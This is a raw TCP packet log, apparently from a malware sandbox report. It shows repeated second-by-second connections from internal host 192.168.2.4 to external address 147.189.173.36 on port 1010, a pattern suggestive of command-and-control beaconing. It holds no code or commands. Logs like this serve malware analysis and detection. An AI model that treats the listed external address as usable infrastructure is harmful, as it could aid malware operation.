                                            Nov 1, 2024 06:25:12.516465902 CET101050214147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:12.516640902 CET502141010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:12.797758102 CET502151010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:12.802654028 CET101050215147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:12.802733898 CET502151010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:12.823715925 CET502151010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:12.828707933 CET101050215147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:12.828762054 CET502151010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:12.833698034 CET101050215147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:13.473401070 CET101050215147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:13.506619930 CET101050215147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:13.506697893 CET502151010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:13.507253885 CET502151010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:13.512622118 CET101050215147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:13.512669086 CET502151010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:13.623347998 CET502161010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:13.629077911 CET101050216147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:13.629189968 CET502161010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:13.651088953 CET502161010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:13.655967951 CET101050216147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:13.656023979 CET502161010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:13.660862923 CET101050216147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:14.314078093 CET101050216147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:14.347264051 CET101050216147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:14.352837086 CET502161010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:14.353471994 CET502161010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:14.358603954 CET101050216147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:14.358865023 CET502161010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:14.473320007 CET502171010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:14.478118896 CET101050217147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:14.478202105 CET502171010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:14.527182102 CET502171010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:14.532042980 CET101050217147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:14.532116890 CET502171010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:14.537585020 CET101050217147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:15.153218985 CET101050217147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:15.185987949 CET101050217147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:15.186969995 CET502171010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:15.276029110 CET502171010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:15.282131910 CET101050217147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:15.282183886 CET502171010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:15.492342949 CET502181010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:15.497267008 CET101050218147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:15.497344017 CET502181010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:15.540375948 CET502181010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:15.545217037 CET101050218147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:15.548835993 CET502181010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:15.553738117 CET101050218147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:16.173248053 CET101050218147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:16.206451893 CET101050218147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:16.206526041 CET502181010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:16.207104921 CET502181010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:16.213212013 CET101050218147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:16.213255882 CET502181010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:16.326740026 CET502191010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:16.331913948 CET101050219147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:16.332192898 CET502191010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:16.362045050 CET502191010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:16.367096901 CET101050219147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:16.371392012 CET502191010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:16.376276016 CET101050219147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:16.993729115 CET101050219147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:17.027070045 CET101050219147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:17.027112961 CET502191010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:17.027875900 CET502191010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:17.033055067 CET101050219147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:17.033102989 CET502191010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:17.139110088 CET502201010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:17.144141912 CET101050220147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:17.144210100 CET502201010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:17.179301023 CET502201010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:17.184115887 CET101050220147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:17.184154987 CET502201010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:17.189052105 CET101050220147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:17.826814890 CET101050220147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:17.860476017 CET101050220147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:17.860527039 CET502201010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:17.861175060 CET502201010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:17.867062092 CET101050220147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:17.867111921 CET502201010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:18.000543118 CET502211010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:18.005426884 CET101050221147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:18.005577087 CET502211010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:18.034499884 CET502211010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:18.039328098 CET101050221147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:18.040848017 CET502211010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:18.045687914 CET101050221147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:18.688507080 CET101050221147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:18.721214056 CET101050221147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:18.721452951 CET502211010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:18.722064972 CET502211010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:18.727447033 CET101050221147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:18.727560997 CET502211010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:18.844840050 CET502221010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:18.850290060 CET101050222147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:18.850502014 CET502221010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:19.029663086 CET502221010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:19.034486055 CET101050222147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:19.034540892 CET502221010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:19.039326906 CET101050222147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:19.342139959 CET502221010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:19.347003937 CET101050222147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:19.347197056 CET502221010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:19.352195978 CET101050222147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:19.524693012 CET101050222147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:19.558389902 CET101050222147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:19.558598042 CET502221010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:19.559123039 CET502221010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:19.566360950 CET101050222147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:19.566575050 CET502221010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:19.670099974 CET502231010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:19.677978992 CET101050223147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:19.678114891 CET502231010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:19.727030993 CET502231010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:19.732043028 CET101050223147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:19.732091904 CET502231010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:19.737016916 CET101050223147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:20.366425991 CET101050223147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:20.399102926 CET101050223147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:20.399168015 CET502231010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:20.399686098 CET502231010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:20.405050993 CET101050223147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:20.405112028 CET502231010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:20.513966084 CET502241010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:20.518865108 CET101050224147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:20.518953085 CET502241010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:20.542745113 CET502241010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:20.547643900 CET101050224147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:20.547702074 CET502241010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:20.552572012 CET101050224147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:21.233357906 CET101050224147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:21.264663935 CET101050224147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:21.264875889 CET502241010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:21.265660048 CET502241010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:21.273196936 CET101050224147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:21.273350954 CET502241010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:21.380827904 CET502251010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:21.387397051 CET101050225147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:21.387608051 CET502251010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:21.623203993 CET502251010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:21.629036903 CET101050225147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:21.629113913 CET502251010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:21.635101080 CET101050225147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:22.041474104 CET101050225147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:22.078015089 CET101050225147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:22.078073978 CET502251010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:22.141536951 CET502251010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:22.146877050 CET101050225147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:22.146924019 CET502251010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:22.381445885 CET502261010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:22.387540102 CET101050226147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:22.387634993 CET502261010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:22.488185883 CET502261010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:22.493311882 CET101050226147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:22.493364096 CET502261010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:22.498274088 CET101050226147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:22.982423067 CET502261010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:22.989602089 CET101050226147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:22.989670992 CET502261010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:23.005057096 CET101050226147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:23.063138008 CET101050226147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:23.095204115 CET101050226147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:23.095417023 CET502261010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:23.096043110 CET502261010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:23.101653099 CET101050226147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:23.101715088 CET502261010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:23.202380896 CET502271010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:23.207350016 CET101050227147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:23.208173037 CET502271010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:23.562122107 CET502271010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:23.570302010 CET101050227147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:23.570369005 CET502271010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:23.581367016 CET101050227147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:23.911179066 CET101050227147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:23.943907022 CET101050227147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:23.943954945 CET502271010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:23.944680929 CET502271010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:23.950452089 CET101050227147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:23.950495005 CET502271010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:24.108661890 CET502281010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:24.113847971 CET101050228147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:24.116893053 CET502281010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:24.147888899 CET502281010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:24.153575897 CET101050228147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:24.156867027 CET502281010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:24.162420034 CET101050228147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:24.803483963 CET101050228147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:24.836669922 CET101050228147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:24.837987900 CET502281010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:24.840747118 CET502281010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:24.846668959 CET101050228147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:24.846930981 CET502281010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:25.137412071 CET502291010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:25.142786980 CET101050229147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:25.142882109 CET502291010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:25.203080893 CET502291010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:25.209105968 CET101050229147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:25.209192991 CET502291010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:25.217178106 CET101050229147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:25.865021944 CET101050229147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:25.902319908 CET101050229147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:25.902381897 CET502291010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:25.903134108 CET502291010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:25.913570881 CET101050229147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:25.913625956 CET502291010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:26.014836073 CET502301010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:26.019884109 CET101050230147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:26.019948006 CET502301010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:26.054754019 CET502301010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:26.060162067 CET101050230147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:26.060204983 CET502301010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:26.065681934 CET101050230147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:26.691436052 CET101050230147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:26.723668098 CET101050230147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:26.726886034 CET502301010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:26.730827093 CET502301010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:26.736989975 CET101050230147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:26.737118006 CET502301010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:26.841969013 CET502311010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:26.846820116 CET101050231147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:26.846959114 CET502311010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:26.999295950 CET502311010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:27.004139900 CET101050231147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:27.004352093 CET502311010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:27.009355068 CET101050231147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:27.531176090 CET101050231147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:27.564229965 CET101050231147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:27.569868088 CET502311010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:27.597677946 CET502311010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:27.603065968 CET101050231147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:27.610826969 CET502311010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:27.798645973 CET502321010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:27.805969000 CET101050232147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:27.806041002 CET502321010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:28.042542934 CET502321010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:28.048043013 CET101050232147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:28.048099041 CET502321010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:28.052944899 CET101050232147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:28.484180927 CET101050232147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:28.517488003 CET101050232147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:28.517577887 CET502321010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:28.518141031 CET502321010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:28.524030924 CET101050232147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:28.524084091 CET502321010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:28.649537086 CET502331010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:28.654540062 CET101050233147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:28.654632092 CET502331010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:28.681848049 CET502331010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:28.694001913 CET101050233147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:28.694075108 CET502331010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:28.702152014 CET101050233147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:29.328043938 CET101050233147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:29.450623035 CET502331010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:29.585699081 CET101050233147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:29.585906982 CET101050233147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:29.586095095 CET502331010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:29.586864948 CET502331010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:29.596054077 CET101050233147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:29.596256971 CET502331010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:29.701607943 CET502341010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:29.707298994 CET101050234147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:29.707397938 CET502341010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:29.737238884 CET502341010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:29.742124081 CET101050234147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:29.742166996 CET502341010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:29.746891022 CET101050234147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:30.383192062 CET101050234147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:30.416162014 CET101050234147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:30.416224957 CET502341010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:30.416740894 CET502341010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:30.421904087 CET101050234147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:30.421958923 CET502341010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:30.530185938 CET502351010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:30.535054922 CET101050235147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:30.535135984 CET502351010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:30.554214001 CET502351010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:30.559081078 CET101050235147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:30.559145927 CET502351010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:30.563952923 CET101050235147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:31.201121092 CET101050235147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:31.234045029 CET101050235147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:31.234194994 CET502351010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:31.235050917 CET502351010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:31.240592957 CET101050235147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:31.240699053 CET502351010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:31.342271090 CET502361010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:31.347254992 CET101050236147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:31.347600937 CET502361010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:31.504884005 CET502361010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:31.509757996 CET101050236147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:31.509929895 CET502361010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:31.514765024 CET101050236147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:32.026710987 CET101050236147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:32.059482098 CET101050236147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:32.059534073 CET502361010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:32.063874006 CET502361010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:32.069061041 CET101050236147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:32.069120884 CET502361010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:32.201898098 CET502371010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:32.206845045 CET101050237147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:32.206928968 CET502371010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:32.233795881 CET502371010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:32.238787889 CET101050237147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:32.238842964 CET502371010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:32.244926929 CET101050237147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:32.888773918 CET101050237147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:32.921555042 CET101050237147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:32.921669006 CET502371010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:32.922605991 CET502371010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:32.927789927 CET101050237147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:32.927875996 CET502371010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:33.029495955 CET502381010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:33.034323931 CET101050238147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:33.034434080 CET502381010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:33.143599987 CET502381010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:33.148559093 CET101050238147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:33.148688078 CET502381010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:33.153661966 CET101050238147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:33.715431929 CET101050238147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:33.748302937 CET101050238147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:33.748351097 CET502381010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:33.749953985 CET502381010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:33.755124092 CET101050238147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:33.755183935 CET502381010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:33.857889891 CET502391010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:33.862713099 CET101050239147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:33.862807035 CET502391010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:33.875072002 CET502391010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:33.879956961 CET101050239147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:33.880006075 CET502391010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:33.884949923 CET101050239147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:34.533013105 CET101050239147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:34.562724113 CET101050239147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:34.562794924 CET502391010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:34.563503027 CET502391010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:34.568633080 CET101050239147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:34.568680048 CET502391010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:34.670438051 CET502401010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:34.675350904 CET101050240147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:34.675431013 CET502401010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:34.707022905 CET502401010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:34.711927891 CET101050240147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:34.719290972 CET502401010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:34.724216938 CET101050240147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:35.352051020 CET101050240147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:35.385060072 CET101050240147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:25:35.385188103 CET502401010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:25:35.386930943 CET502401010192.168.2.4147.189.173.36
